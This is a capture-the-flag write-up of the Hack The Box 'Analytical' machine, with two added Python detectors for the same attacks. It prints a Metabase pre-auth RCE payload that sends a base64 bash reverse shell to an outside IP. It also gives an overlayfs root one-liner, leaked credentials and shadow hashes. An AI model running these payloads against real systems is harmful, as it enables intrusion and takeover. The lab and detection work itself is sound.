Basic Information

Port Scan

Ports 22 and 80:

$ nmap -sC -sV -Pn 10.10.11.233
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 15:45 CST
Nmap scan report for 10.10.11.233
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://analytical.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.75 seconds

Port 80

A hosts entry is required:

10.10.11.233 analytical.htb

The site is a data-analytics service; the Login link in the top-right corner reveals the subdomain data:

data.analytical.htb

After adding a hosts entry for it as well, visiting it shows a Metabase instance:

Metabase

The Metabase version can be read from the response:

A search turns up the relevant vulnerability:

According to the article, exploitation has two parts: first obtain the token, then exploit through SQL.

Token

Obtain the setup-token through the endpoint given in the article:

249fa03d-fd94-4d5b-b94f-b4ebf3df681f

Shell

Second step: use the obtained token to trigger the RCE. The payload below combines the one from the article with the one from GitHub:

$ echo "/bin/bash -i >&/dev/tcp/10.10.16.10/4444 0>&1" | base64
L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTAvNDQ0NCAwPiYxCg==

{"details": {"details": {"advanced-options": true, "classname": "org.h2.Driver", "subname": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTAvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}')\n$$--=x", "subprotocol": "h2"}, "engine": "postgres", "name": "x"}, "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f"}
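As an added, defender-side example (not part of the original writeup), the following Python inspects a Metabase database-setup request body for the pattern used in the payload above: an H2 JDBC subname carrying executable SQL/JavaScript, an `engine` value that does not match the H2 driver/subprotocol, and a base64 run that decodes to a reverse-shell command. The sample bodies are constructed to mirror that payload, with a placeholder IP and token; the regexes are detection heuristics, not Metabase's own validation logic.

```python
import base64
import json
import re

# Heuristics for executable content smuggled into an H2 JDBC connection string
# (the "subname" field of a Metabase database-setup request).
H2_ABUSE_PATTERNS = [
    re.compile(r"CREATE\s+TRIGGER", re.I),
    re.compile(r"\$\$\s*//\s*javascript", re.I),
    re.compile(r"java\.lang\.Runtime", re.I),
    re.compile(r"\bINIT=", re.I),
]
# Fragments that, after base64 decoding, indicate a reverse shell.
SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bbash\s+-i\b"),
    re.compile(r"\bnc\b.*\s-e\b"),
]
# A run of 24+ base64 characters with optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_embedded_base64(text):
    """Best-effort decode of every base64-looking run in text; invalid runs are skipped."""
    decoded = []
    for match in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad padding/characters
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


def analyze_request_body(body):
    """Return findings for one JSON request body; entries prefixed 'info:' are informational."""
    try:
        doc = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return ["body is not valid JSON"]
    details = doc.get("details") if isinstance(doc, dict) else None
    if not isinstance(details, dict):
        return []
    inner = details.get("details") if isinstance(details.get("details"), dict) else {}
    engine = details.get("engine")
    classname = str(inner.get("classname", ""))
    subprotocol = str(inner.get("subprotocol", ""))
    subname = str(inner.get("subname", ""))

    findings = []
    if classname == "org.h2.Driver" or subprotocol == "h2":
        findings.append("info: H2 driver requested via database-setup API")
        if engine and engine != "h2":
            findings.append(f"engine '{engine}' does not match the H2 driver/subprotocol")
    for pat in H2_ABUSE_PATTERNS:
        if pat.search(subname):
            findings.append(f"executable content in JDBC subname: {pat.pattern}")
    for text in decode_embedded_base64(subname):
        for pat in SHELL_PATTERNS:
            if pat.search(text):
                findings.append(f"base64-embedded shell command matches {pat.pattern}")
    return findings


def is_malicious(body):
    """True when any non-informational finding is present."""
    return any(not f.startswith("info:") for f in analyze_request_body(body))


# Constructed samples (placeholder IP and token; not captured traffic).
_SHELL_B64 = base64.b64encode(b"/bin/bash -i >&/dev/tcp/203.0.113.5/4444 0>&1\n").decode()
MALICIOUS_BODY = json.dumps({
    "details": {
        "details": {
            "advanced-options": True,
            "classname": "org.h2.Driver",
            "subname": (
                "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
                "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON "
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n"
                "java.lang.Runtime.getRuntime().exec('bash -c {echo," + _SHELL_B64
                + "}|{base64,-d}|{bash,-i}')\n$$--=x"
            ),
            "subprotocol": "h2",
        },
        "engine": "postgres",
        "name": "x",
    },
    "token": "00000000-0000-0000-0000-000000000000",
})
BENIGN_BODY = json.dumps({
    "details": {
        "details": {
            "classname": "org.h2.Driver",
            "subname": "zip:/app/metabase.jar!/sample-database.db",
            "subprotocol": "h2",
        },
        "engine": "h2",
        "name": "Sample Database",
    },
    "token": "00000000-0000-0000-0000-000000000000",
})

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, is_malicious(body), analyze_request_body(body))
```

The engine/driver mismatch check is the cheapest signal: a request that claims `postgres` while pointing at `org.h2.Driver` has no legitimate reason to exist, so it can be alerted on even if the subname heuristics are evaded.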

This lands a shell inside the metabase container:

Information

The environment variables inside the metabase container contain a set of credentials:

META_USER=metalytics
META_PASS=An4lytics_ds20223#

User Flag

These credentials allow SSH login to the host:

Privilege Escalation Information

Searching by the kernel version turns up the relevant vulnerability:

Privilege Escalation & Root Flag

One-shot exploit (exploits for some other older vulnerabilities also work, but that is presumably unintended; an Easy-rated box is not that involved):

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("chmod +s /bin/bash")'
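Added example for the defending side (not from the writeup): the one-liner above needs an unprivileged user namespace (`unshare -r`), an overlay mount with an `upperdir`, and `setcap cap_setuid` on a copied binary. The Python below correlates those stages per user over constructed process-execution lines (the `timestamp user pid cmdline` layout is invented for the demo, not auditd output) and checks a `sysctl` dump for whether unprivileged user namespaces are allowed at all; `kernel.unprivileged_userns_clone` is the Debian/Ubuntu-specific knob and `user.max_user_namespaces` the upstream limit.

```python
import re
from collections import defaultdict

# Constructed process-execution events in an invented "timestamp user pid cmdline" layout
# (not real auditd output). The metalytics lines mirror the chain above; alice's overlay
# mount is a legitimate admin action used as a negative case.
SAMPLE_EVENTS = """\
10:01:02 metalytics 2001 /bin/bash
10:01:10 metalytics 2002 unshare -rm sh -c mkdir l u w m && cp /usr/bin/python3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;
10:01:10 metalytics 2003 setcap cap_setuid+eip l/python3
10:01:10 metalytics 2004 mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m
10:01:11 metalytics 2005 u/python3 -c import os;os.setuid(0);os.system("id")
10:02:00 alice 3001 mount -t overlay overlay -o lowerdir=/srv/a,upperdir=/srv/b,workdir=/srv/w /mnt/x
10:02:05 alice 3002 ls -la /mnt/x
"""

# One regex per stage of the chain. The unshare pattern accepts the short "-r" (possibly
# bundled, as in "-rm") and the long "--map-root-user" form; it is a heuristic and may
# also match an "r" in flags of a command run under unshare.
STAGES = {
    "userns_root_map": re.compile(r"\bunshare\b.*(\s-[a-zA-Z]*r|--map-root-user)"),
    "overlay_mount": re.compile(r"\bmount\b.*-t\s+overlay\b.*\bupperdir="),
    "setcap_setuid": re.compile(r"\bsetcap\b.*cap_setuid"),
    "setuid_from_upper": re.compile(r"setuid\(0\)"),
}


def parse_events(text):
    """Parse the constructed layout into dicts; blank lines are ignored."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, pid, cmd = line.split(" ", 3)
        events.append({"ts": ts, "user": user, "pid": int(pid), "cmd": cmd})
    return events


def detect_overlay_userns_chain(events, min_stages=3):
    """Return {user: [stages]} for users whose commands cover at least min_stages stages."""
    seen = defaultdict(set)
    for ev in events:
        for name, pat in STAGES.items():
            if pat.search(ev["cmd"]):
                seen[ev["user"]].add(name)
    return {u: sorted(s) for u, s in seen.items() if len(s) >= min_stages}


def unprivileged_userns_allowed(sysctl_text):
    """Parse `sysctl -a`-style output; False only if a knob explicitly blocks unprivileged user namespaces."""
    values = {}
    for line in sysctl_text.splitlines():
        if "=" in line:
            key, val = line.split("=", 1)
            values[key.strip()] = val.strip()
    if values.get("kernel.unprivileged_userns_clone") == "0":  # Debian/Ubuntu knob
        return False
    if values.get("user.max_user_namespaces") == "0":  # upstream limit
        return False
    return True


if __name__ == "__main__":
    print(detect_overlay_userns_chain(parse_events(SAMPLE_EVENTS)))
    print(unprivileged_userns_allowed(
        "kernel.unprivileged_userns_clone = 1\nuser.max_user_namespaces = 63208\n"))
```

A single overlay mount (alice) stays below the threshold, while the combination of a root-mapped user namespace, an overlay `upperdir`, and `cap_setuid` from one user is what distinguishes this chain from ordinary container or admin activity. The sysctl check is the configuration-side counterpart: where unprivileged user namespaces are disabled, the first stage cannot run at all, though the real fix for the kernel bug is the patched kernel.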

Shadow

root:$y$j9T$aVUkVU8LWFNEuXdwrOIJH.$jF8hy0vMzBJTvu/.HkzP0E4ZObo1I.frOPRVj2ktqM2:19576:0:99999:7:::
metalytics:$y$j9T$juJFLKOECgSAR5LiOX1Or.$LevBUAgKibrIsqHCjXhY2ND3inwq40NcwaK6pK/XFS1:19572:0:99999:7:::

References